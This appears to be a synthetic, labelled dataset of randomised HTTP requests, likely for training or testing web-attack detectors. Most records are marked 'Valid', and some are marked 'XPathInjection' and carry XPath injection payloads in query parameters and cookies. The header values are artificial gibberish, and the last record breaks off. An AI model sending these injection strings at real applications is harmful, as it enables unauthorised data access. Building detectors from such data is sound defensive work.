Connection: saulJyi
Accept: video/*, audio/basic
Accept-Charset: windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 43.104.83.62
Cookie: skT=tslghi ldhg
Cookie2: $Version="0"
Date: Thu, 29 Apr 10 08:42:15 GMT
ETag: "kVwijeAcZzUzGU5mZYyZ"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Tue, 18 May 04 11:02:27 GMT
If-Unmodified-Since: Fri, 10 Apr 09 03:09:54 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Jan 06 16:44:22 GMT
Max-Forwards: 17
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: Digest username="deilL"
Range: 346642-698,469-394,8-
Referer: /sIzdr.txt
TE: chunked,deflate,chunked
Trailer: Date
User-Agent: jnze6ej5uustaeolt
UA-CPU: Sparc
UA-Disp: 058,5611,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 172.159.37.56
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30230
Start - Id: 24178
class: Valid
GET /myqMjs.asp?or9=399028788&egoM7qbSnykm=8xtplxoQXq&inD4f.773=r3qsNFB13VQ&ytEnrLtes=636&5gnzloinAdsL=rp%7ENtee1&oLHBsSAv8=%40+noir&acceptwS2GMsJC=sontnolh&rSr92hso5e=os%29n4pprocessing-instruction1sroyersaN&1idosSneeoHtnr=2052906&rsnWmga=198775&2t=50762649&iettoaELofl3=7a&rdlac4efaet=%3C%242eh5 HTTP/1.1
Host: www.er5yQarn.gov
Connection: close
Accept: application/*;q=0.0
Accept-Charset: us-ascii, x-mac-japanese
Accept-Encoding: gzip;q=0.9, compress, deflate
Accept-Language: feetrEr-AuanrhB, 9ssuc-dE, wjhTne-nebeisE5;q=0.6
Cache-Control: no-transform
Client-ip: 218.99.99.50
Cookie: 5fr=87046675;rtlk=e
Cookie2: $Version="5"
Date: Tue, 09 May 06 06:11:50 CET
ETag: W/"rIinki-Nfq4@qaOn"
Expect: 100-continue
From: caiN@asyn.com
If-Modified-Since: Thu, 25 Mar 10 24:45:28 CET
If-Unmodified-Since: Sat, 02 Jul 05 22:01:36 GMT
If-Match: "9zu40z_inDnVpmS_"
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 1.4
Pragma: sTk='Eora'
Proxy-Authorization: Digest realm
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: /hiiteox/zlih1ci/XbwaEab.js
TE: chunked;q=0.6
Trailer: Authorization
User-Agent: Mozilla/1.0 (X11; U; SunOS sun4u 1.1; ai-bd; rv:6.1.4) Gecko/85966619
UA-CPU: PowerPC
UA-Disp: 848,875,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 6.1 www.jnnrslq.jpg, 3.7 www.o1ySs.html:30498, 6.0 www.sjeeh.htm
Transfer-Encoding: identity
Upgrade: aeeid/9.3, Dosetd/3.2, lttser/5.0
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 742584885345002527
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24178
Start - Id: 12291
class: Valid
GET /ceEn/ncAWGu1xdfAqGe/nzh/wo6F/yfa/ol2tnqdIswp7aedax9ae/nd/zumVrI.U/ewbtfnimcI2mOHoiehg/mEz2sUikt.png?h5surirevne7s=4&xMGGl=nno&No5eOsutu=i0QV2qTY-k5g&naI=ja2sis&c5unDjpm=tm6otjatus&etIabh0z=f5Vw&oOrLrqlerfO=EjuEu%3Cos&estonzsahreaa1=InSPieYFsy3te&serviceska7unionNwinntAshutdown7=a+3ag6wsrya&documentbkXsmeta=h8&uooieoWlm1ah2i=ml5Olj6tmduY&lw2o=bt&bgbai=rahKJh&dpANjxSFFW7X=cai HTTP/1.1
Host: 240.26.112.42
Connection: keep-alive
Accept: application/zip, image/*, video/*
Accept-Charset: iso-8859-2;q=0.6, windows-1252, iso-8859-7, big5, euc-cn
Accept-Encoding: 
Accept-Language: cuttrho-onsd, t4Vscs-ie;q=0.7
Cache-Control: max-stale
Client-ip: 8.180.18.17
Cookie: tene6uQrcexNe=3l4fuf
Cookie2: $Version="003"
Date: Sat, 06 Feb 10 24:34:03 UTC
ETag: "GwBN0nMB2QWnAOLX"
Expect: 100-continue
From: ata0ted@pthuw.ch
If-Modified-Since: Sun, 23 Jul 06 23:03:41 GMT
If-Unmodified-Since: Fri, 13 Nov 09 04:47:26 CET
If-Match: *
If-None-Match: "xakNsK.RajElORr2q@t"
If-Range: "GcNcT4gv9eOzEq.4"
Max-Forwards: 19
MIME-Version: 5.0
Pragma: Rl='ytfh1o'
Proxy-Authorization: Basic dG1yeWxhajY6YjVsMnVhdG8=
Authorization: NTLM Y2FhcW4xZXJhZXN0cmV0YTQxdGx0YWhhdG90ZXRpaGU=
Range: -1,-2258,62-
Referer: http://lLeedlto.org/yngn3.asmx
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: Mozilla/3.9 (Windows; U; Win98 3.1; sh-sg; rv:7.5.9) Gecko/22131488
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 981x039
Via: FTP/0.9 www.eegx.js
Transfer-Encoding: gzip
Upgrade: yohoh/1.0, aet/2.6, xthnat/0.6
Warning: 710 44.94.63.159 "Dh6webSt4" 
X-Forwarded-For: 108.211.80.19
X-Serial-Number: 787463
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12291
Start - Id: 9049
class: Valid
GET /umSe/tJ9VbI_L_FQ.lnQCQ.shtml?ewtnscelanetveE=oxp_ect%5Cehepbultss&xs=pi%26g7htacces+aol&ahre3rds=29208&@MmYqa@Qh=eIe%5Dekhk%40en0&h5im0et=5&_j5cfJBkS=y%29im&B8inputL=sm5Xpx0Xs&xmyakAatebu2e=9446033&T9cbQ=%3FW%5B HTTP/1.0
Host: www.lgaimb.fr
Connection: eroTihU
Accept: image/*, text/plain, application/*;q=0.0
Accept-Charset: iso-8859-5;q=0.9, koi8-r, iso-8859-8, koi8;q=0.0
Accept-Encoding: 
Accept-Language: t-eute;q=0.9, zD-pen7;q=0.9, 4njpsid4-r5ef;q=0.5, xAheoar2-9a1eno, tifrevxa-ewlnhms4
Cache-Control: no-cache
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="634"
Date: Wed, 03 Feb 10 22:38:14 GMT
ETag: "DI4ds9YeaV3hd@S_XAy"
Expect: mjl9tid
From: nYe8@Sqo1l5.uk
If-Modified-Since: Thu, 17 Jun 04 05:01:11 UTC
If-Unmodified-Since: Tue, 13 Jan 04 09:01:54 GMT
If-Match: "tMgj_42O_TwwnWih"
If-None-Match: *
If-Range: Tue, 13 Jul 04 23:47:43 UTC
Max-Forwards: 08
MIME-Version: 8.0
Pragma: aH=beeeot
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: Basic dXM5d246aGJBdmg=
Range: -9,-8753
Referer: /taty/sllna/rzxe7/eeffngl/ynvs8P9a.mpg
TE: deflate
Trailer: TE
User-Agent: Mozilla/3.5 (compatible; Konqueror/2.7; Solaris; eo3ou8r; ndesou; dhoety)
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 117x032
Via: 1.2 149.243.70.125, 2.6 www.eerho.jpeg
Transfer-Encoding: sej6x; elhr=oPntiN
Upgrade: oicaw0/1.6, fIvar4/1.2, iut7eu/0.8, 8nbl/3.1, 0ehUrq/7.3
Warning: 394 66.20.115.11 "wuelrtshiipI1Cr9mi" "Mon, 05 May 08 03:16:51 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9049
Start - Id: 34737
class: Valid
PUT /x0BlWyVx5cHwy-r6/E2ishmsfjeeoteTrpetr/0phps/6gxFV/iB0Rw-LricfL/dw5EhI/nLWRdf/eAS5DbBdqr4BxVqd.html? HTTP/1.1
Content-Length: 43
Content-Language: tcicn
Content-Encoding: gzip
Content-Location: /2tiies/tshTi/shndoce/gtEuhra.doc
Content-MD5: aXNiaHR1Zmhpc25lZXJiYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jan 07 23:45:46 CET
Last-Modified: Mon, 19 Nov 07 23:27:20 GMT
Host: 187.225.189.20
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: macintosh;q=0.1, x-mac-turkish, iso-8859-8, windows-1255;q=0.3
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 162.14.216.140
Cookie: enmaenltl=59;goh=dlllltxyaeouec
Cookie2: $Version="35"
Date: Sat, 05 Nov 05 24:44:46 GMT
ETag: W/"d.N7jCJ12skH8aUUO"
Expect: 100-continue
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Wed, 16 May 07 05:50:07 UTC
If-Unmodified-Since: Thu, 29 Jan 04 08:00:08 UTC
If-Match: "KYBuHkk6B2bIDiXB4u1"
If-None-Match: *
If-Range: *
Max-Forwards: 062
MIME-Version: 4.5
Pragma: iaid='jqzsStt'
Proxy-Authorization: Digest algorithm=g3ehNez
Authorization: NTLM cnA1NGZ5dHhveXNycnRlNlJ5MnN2bzVjbnVoSGF0ZWZlY2Y0
Range: -91770
Referer: /koedSe.pl
TE: trailers,chunked,gzip;q=0.3
Trailer: TE
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 3.0; dt-cm; rv:2.2.2) Gecko/38830111
UA-CPU: x86
UA-Disp: 366,3998,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 420x8395
Via: HTTP/1.4 www.arnedTa.jpg, 6.3 www.anrs.jpg:40690, gwi/4.9 www.nceewIa.js
Transfer-Encoding: a2li
Upgrade: ndnsb/1.0, efsssf/8.5, t7tuy/1.9, htoq/4.5, aeo/9.0
Warning: 636 www.T3edR.css:19 "nPNuowhpty5d" 
X-Forwarded-For: 66.86.162.41
X-Serial-Number: 8267769973
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

kptcrlocationZi=157506&0o0m._ksUD3=26599407

End - Id: 34737
Start - Id: 49950
class: XPathInjection
GET /kBBY0U1mQGZRDyHwT/@.NfIV5@nodechild.jsp?AobcCdc0Lsd=80736&n4ri=5111&ndaSEst4euna=oLgto1Ehs8ueAa&GXG1I=tFn7aloV4T&gIeat=%28i+%3C++++count%2838ldD%2Fchild%3A%3Atext%28%29%29++and++++j++++%3C+++++count%28aD%2Fchild%3A%3Acomment%28%29%29++++and++++k+%3C+count%280i%2Fchild%3A%3A*%29+%29&trranripcuunh=942&ercngr5ftykebid=rr13+d-f2oaD%24d&s9ttmco8ta=fOo6alloptnroadmin&banstaeaett=oeerupb&eqhi=eMbERgP6DY&or=yTVzBOJHl&iif6ngd=61&qZET=mCby1&1izeTesri=aJSsb&nraK2RsKmirs=1etlt HTTP/1.0
Host: 234.152.119.78
Connection: close
Accept: image/*, video/mpeg, image/jpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: ypab-desd, ta-l5e1Ej7, piat-2ellr;q=0.3, dothT-hl, ee6cKtc-9vnrkbHa;q=0.2
Cache-Control: no-cache
Client-ip: 6.57.199.123
Cookie: oio= +I;stinuspbitntniv=dsta;window.openu7R4sock_streamt7eZ=968066;SQ4LH.j_5Ek=bKKg81H2
Cookie2: $Version="9"
Date: Tue, 18 Apr 06 12:36:55 CET
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Thu, 04 Mar 04 20:16:15 GMT
If-Unmodified-Since: Thu, 16 Jun 05 01:51:07 UTC
If-Match: *
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Thu, 13 Mar 08 19:10:42 GMT
Max-Forwards: 27
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: /ichdfLw.exe
TE: trailers
Trailer: If-Range
User-Agent: aonpnr (leZL1b7xA; sO3pfcdbLr; oIGJ8R; nOBxIHH8_q; rUfkdc8c)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: ueeaak
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 150 www.dveacIt.jpeg "Sy2gleewctth" "Sat, 02 Jan 10 06:19:03 GMT"
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49950
Start - Id: 6334
class: Valid
PUT /kz9IL2/qTfcQzB1waIiCP40/zhCV-u/s8.oUIEHDJsp/du.Mglt-UZ/of52Osawp60T/nEe20pdUrwrC-03@mp.gif? HTTP/1.0
Content-Length: 290
Content-Language: nsxeq,yylerams
Content-Encoding: compress
Content-Location: /ctcfdeh/ltao/a0k3/artut5eh.bin
Content-MD5: aWV1YW50NW54bzg0RmVyeg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Nov 09 09:19:26 CET
Last-Modified: Fri, 15 Jul 05 12:23:20 UTC
Host: www.ianlT.st
Connection: keep-alive
Accept: image/*;q=0.3, image/*
Accept-Charset: iso-8859-3
Accept-Encoding: gzip;q=0.6, identity;q=0.0, identity;q=0.8
Accept-Language: ealr-eod7;q=0.9, svljmneb-uprvtiti, nhvtleL-rusTobe;q=0.5
Cache-Control: no-cache
Client-ip: 40.58.129.230
Cookie: ehotaOeht=totsm1bhltri
Cookie2: $Version="92"
Date: Mon, 12 Jan 09 14:51:42 CET
ETag: W/"9UHlXsF@Iu6J5EC"
Expect: 100-continue
From: zpatr@agAlejxt.net
If-Modified-Since: Tue, 12 Jun 07 17:39:35 CET
If-Unmodified-Since: Tue, 17 Feb 09 10:35:21 CET
If-Match: "l1_8uz-8Cg0zaqcEw0hh"
If-None-Match: "82Ho-uCf3cJ2flJOC."
If-Range: *
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWN6YTNlbmV0TnJldG5pb2VudWVzdW42amU1cnJwZnNwZWxuNWZseXRzY2Fs
Authorization: nmcTr aheccrgi=eanliHki
Range: 137601-
Referer: /dhclnp4x/saite/salati.htm
TE: trailers
Trailer: Transfer-Encoding
User-Agent: eecceeute (t@gn90b_; 4MXAFmEr)
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9611x0201
Via: HTTP/3.6 172.35.125.62:4933, FTP/4.9 209.112.53.149:61, FTP/1.3 www.tweainnr.jpg:690
Transfer-Encoding: 5ko5wa
Upgrade: mnlEe/6.9, ss49D/6.8
Warning: 484 123.79.24.147 "niett6" 
X-Forwarded-For: 150.186.242.245
X-Serial-Number: 9387717978
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

A9zyoAK4dm=jhwp-oaeteincludee&ezifpvoecnak=77587&Hx=u&es8n1igte=3717580847&slR=irxaY4.ZKOHm&stm=65268&ardeodmlsohptr=6Ke0Hl&gn5uv2gef=l0ew4g&P361TIyU=sdLdha5aanage&eihraEd9e6hfl9=Os2cnxcpL&WwTBEGo=8sn0er&pocvren8t=positionsystemteAUxrfnn=cmdv%6ml[&8ilrswxhsg=96kW&ihlodd=sr3nEn&asb=73

End - Id: 6334
Start - Id: 24817
class: Valid
GET /aa@kA/mlinkWgO_rKIZH/iyKowb5nySw6bmw-2-R/s7jDcm_YaI9Q@7H.php4? HTTP/1.0
Host: 86.149.104.54:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-7;q=0.1, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 222.92.138.8
Cookie: 7a06tuwns7oena=688284385;rwYV_=atr;6o=)sot
Cookie2: $Version="951"
Date: Tue, 06 Mar 07 20:11:24 UTC
ETag: W/"PrpIvSlgc--NP_ZpLfXu"
Expect: gshsel
From: iesi0goR@Pnih.ch
If-Modified-Since: Sat, 04 Aug 07 13:32:36 CET
If-Unmodified-Since: Tue, 28 Nov 06 17:44:53 CET
If-Match: "gxiRxOc.kjHnG3@sP"
If-None-Match: "D0aB7PqN31Ii95k"
If-Range: Thu, 15 May 08 14:18:37 GMT
Max-Forwards: 4
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: gorde dTualqud=ua37ml
Range: 1-382
Referer: http://eetiE.st/E2iq.jsp
TE: deflate
Trailer: Date
User-Agent: dtgkIara3fatg95hh
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 577x412
Via: HTTP/7.7 www.82wutt5l.css
Transfer-Encoding: gzip
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 242 103.81.240.13 "nIooeeg" "Mon, 29 Aug 05 22:00:16 CET"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 24817
Start - Id: 17670
class: Valid
GET /gCieuAyurAeuMa4Dkl/aMcBGvgmZ/dckrfe/fhhWobot5s9p8EeEes5a/leTpwd@56zC/eEAtb/ndka/uUqU4ifPJ/tw.jpg?5tdy3document=3&czdurizxeine6=qga%28hd HTTP/1.1
Host: www.wosTinopl7.st:80
Connection: keep-alive
Accept: text/plain, application/*;q=0.5, application/*
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ptmpyes='No'
Client-ip: 230.206.198.120
Cookie: 8toS3aEs5ecd=n%m etc%
Cookie2: $Version="003"
Date: Mon, 03 Aug 09 01:41:56 CET
ETag: "w3D25KVVt4PU3k45y0kF"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Thu, 20 Apr 06 07:12:52 GMT
If-Unmodified-Since: Sun, 28 Aug 05 03:14:47 UTC
If-Match: "xlC_.@1_fnlXsG916Da"
If-None-Match: *
If-Range: Sat, 30 Apr 05 05:09:57 CET
Max-Forwards: 04
MIME-Version: 0.7
Pragma: rioxw=hmetd
Proxy-Authorization: naEsom epan=kt4tmtNl
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: http://eJcse.ch/luir/XceD/twnetEse/eosba/4mee.aspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 5.3; ie-aa; rv:2.1.4) Gecko/23471951
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: mmls/7.0 85.185.6.117, 2.7 www.oqju4.html
Transfer-Encoding: compress
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 6572400
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17670
Start - Id: 32490
class: Valid
GET /sLFYu/enn8snr/ECIB-h/myt4DA/xmaXk/0V4@sCQh5/gsTvmoar/eeyjece/tPleeRtZysIA6Ott8/tmorenotraap6rKlrps/8rtmpNh.jsp?a66detthobongr=cTydnOuooaTw HTTP/1.1
Host: www.r6y1.st
Connection: close
Accept: audio/*, application/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.8, deflate, gzip
Accept-Language: r-dday7;q=0.8, eoro7-vydNlfsh;q=0.5
Cache-Control: no-cache
Client-ip: 73.241.163.39
Cookie: ameri=fOHFX8xtAy;mn=:aopen
Cookie2: $Version="5"
Date: Sun, 19 Oct 08 04:54:42 CET
ETag: "ld8Bp9My.mrVep5H0h"
Expect: 1nee
From: scowa@lgoehnG.com
If-Modified-Since: Mon, 19 Dec 05 18:14:54 CET
If-Unmodified-Since: Wed, 20 Jun 07 16:15:57 GMT
If-Match: *
If-None-Match: "uGR@ncgFdFodS-zAYB1"
If-Range: Thu, 11 May 06 08:31:45 GMT
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest nc=7E1c1459
Authorization: t6d1 sYlndee=res4Dt
Range: -99,-1
Referer: http://osyt7.uk/pahd.tar.gz
TE: gzip;q=0.3,trailers,trailers
Trailer: Date
User-Agent: Mozilla/3.0 (compatible; Konqueror/1.2; Windows NT; tEeas; aeu71iwtu; tir3daMi9u)
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 630x705
Via: See/0.3 www.uklwsiw.gif, 4.7 86.102.195.93:3369
Transfer-Encoding: compress
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 713 41.175.127.210 "4pro4MwehDewuNefafn" 
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32490
Start - Id: 14419
class: Valid
GET /uistttrzeza3eeeniDs.js? HTTP/1.0
Host: www.nn86rlattn.uk
Connection: keep-alive
Accept: video/*;q=0.8, audio/*, image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ueddmbm-ceo;q=0.1, oaueg-beodd;q=0.1, oL7htfr-hsc, v-upWton;q=0.6
Cache-Control: no-cache
Client-ip: 149.65.35.61
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="4"
Date: Sun, 11 Jan 04 23:11:32 UTC
ETag: W/"0gcSGvE5foaK2fSTQ"
Expect: uruotj
From: e6n4@6lItU3epr.st
If-Modified-Since: Mon, 12 Apr 04 01:17:07 CET
If-Unmodified-Since: Mon, 07 May 07 08:17:14 GMT
If-Match: "7.RJNC.co5Fg3-zWOqt"
If-None-Match: "DupB@tR9KNd6VED1"
If-Range: Sat, 22 Aug 09 05:40:29 CET
Max-Forwards: 6
MIME-Version: 7.2
Pragma: mr9=e6
Proxy-Authorization: Digest cnonce="edie"
Authorization: Basic c2dybzVsaDppY3Jv
Range: -5585
Referer: http://7ihl.com/weeDrs/xewrfkua/pyrdbur.php4
TE: trailers,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.0 (Windows; U; WinNT 8.3; It-at; rv:7.2.7) Gecko/70059242
UA-CPU: MIPS
UA-Disp: 769,941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: FTP/7.8 www.wtts.jpeg, 7.6 www.L5Rt5ras.jpg, 5.1 www.rssrum.css
Transfer-Encoding: eetrms
Upgrade: rean/3.6, zmcrDo/5.0, aoielb/7.5, Hearne/3.1
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14419
Start - Id: 24967
class: Valid
GET /nSD2xMtlNRhB/3qLH_Yn1p/aTayteiOe/2Ckx/66VGqU/uWY/a_3AR0HMzdOXn@t_XSz.nsf?lhgysyln=replace&atanw=0887&atfsditfnpiat4c=oa&rwsEl2htrfmtzf7=443884&RerwdeH=17&c8et=8&dsAe3or2dttao=yja&_XSVOIprocessing-instruction=+tig%3B HTTP/1.1
Host: www.njea.com
Connection: keep-alive
Accept: video/quicktime;q=0.2, text/xml, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 77.220.63.231
Cookie: neccr6tg=91330;xpyu1raldtmh8l=0t6bsosdadmet;tsiei=mxntov2SntItHedgroup by~;UW@Ddrop=e7enentt;eeha=ad4ask;tphqnHaiEelcV=iz1edpteeg
Cookie2: $Version="910"
Date: Thu, 24 Mar 05 10:09:11 UTC
ETag: W/"TwUFugKiaNsse5Cr"
Expect: 8xdsh
From: iefmllR@anati.de
If-Modified-Since: Sat, 25 Apr 09 12:45:37 CET
If-Unmodified-Since: Sat, 09 Jun 07 12:09:49 GMT
If-Match: *
If-None-Match: "-RM7ggQ_Rd_lFJt6"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.8
Pragma: naa=50ivtsft
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: bEar b2nNc=eooLiebl
Range: 528-04
Referer: /zepbrh/l4geef/f8GiyoY/9rgaioi.rar
TE: gzip;q=0.7,gzip,chunked
Trailer: If-Range
User-Agent: tdCXDu@LO3 http://www.ilsAo6.org
UA-CPU: PowerPC
UA-Disp: 1036,157,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8440x807
Via: 4.2 157.135.140.40, HTTP/9.2 www.7hepgv.jpeg:7411
Transfer-Encoding: gzip
Upgrade: owsiw/5.6, ofet8/3.7
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 95297719813252220889
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24967
Start - Id: 21297
class: Valid
GET /jG1Jjw5API-w@/oQ/hlnT/6JLpscriptgroup bye-/puna6QtrG/hfvlW/11otZoWiFg/hmzim/Rk6/ip/ncLsiTroeOeUpt.sh?ribdf40leeehtis=nrO%7Ebhttps&Ht_ypMy9sp@=ratrxoaitF0h&odty=jLaVY&oeeb=58927 HTTP/1.0
Host: www.ezitrualrn.com:765
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate, deflate, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=585
Client-ip: 244.23.171.252
Cookie: onuSgnyrlbs=b5usr>opt2dostdinvira %eAz
Cookie2: $Version="565"
Date: Wed, 26 Apr 06 19:02:48 UTC
ETag: "TGlCpO2QRbtWoKg"
Expect: tihedss0
From: toee@Ueel0eilM.gov
If-Modified-Since: Sat, 28 Feb 09 03:15:23 GMT
If-Unmodified-Since: Thu, 15 Mar 07 19:21:17 UTC
If-Match: "8iQ312zXUddcKB2LRNj"
If-None-Match: *
If-Range: Fri, 16 Jan 09 19:51:12 GMT
Max-Forwards: 1307
MIME-Version: 3.2
Pragma: zno='ghxt'
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: dnmtt aieee4A=oegr
Range: 863-
Referer: http://www.eTwa.gov/fmiqhu.jsp
TE: deflate;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 4.4; ks-ll; rv:3.9.3) Gecko/47498750
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 714x7693
Via: 8.2 www.rs6ioy.jpg, HTTP/5.7 www.ysdthure.htm
Transfer-Encoding: compress
Upgrade: jo1s/5.7, pd21Xt/6.2, eoio/7.4, oeOe5h/7.8
Warning: 749 www.en5tssls.jpg "nqn0" "Mon, 30 Aug 04 15:46:19 UTC"
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 900444
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21297
Start - Id: 48399
class: XPathInjection
GET /hKimgl.yrrErfO/kbXybDdBvXcx/Shhteot5e5ooe/rnirvzsaf/Optmtti/hUERu@sV7xlJ9.shtml?wa=anan%2Fjxtsr&kMB4C=eyos9bjt&LcopymailP--hBDC=eo&fRef8onz=BbethPcwcdptEIsiM&gOti=slndmns&wt=57864&yfconnectQhSLnph-6=628192&zcanTr0lsso=oa+1reMe&nzeahhIh4hi3oef=novoe6&of7eayr=meta&yhgoueitNqu=9190 HTTP/1.1
Host: www.stxrn.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 60.234.178.167
Cookie: y45loaw=8     or diwDW/r6o/onjzpc/child::node()[position()=762]   or  47501=
Cookie2: $Version="963"
Date: Sun, 13 Nov 05 01:58:28 UTC
ETag: W/"Gqax0ylWgLa_Q4qM"
Expect: chacin=wsyh
From: geiEtz@rYpta.de
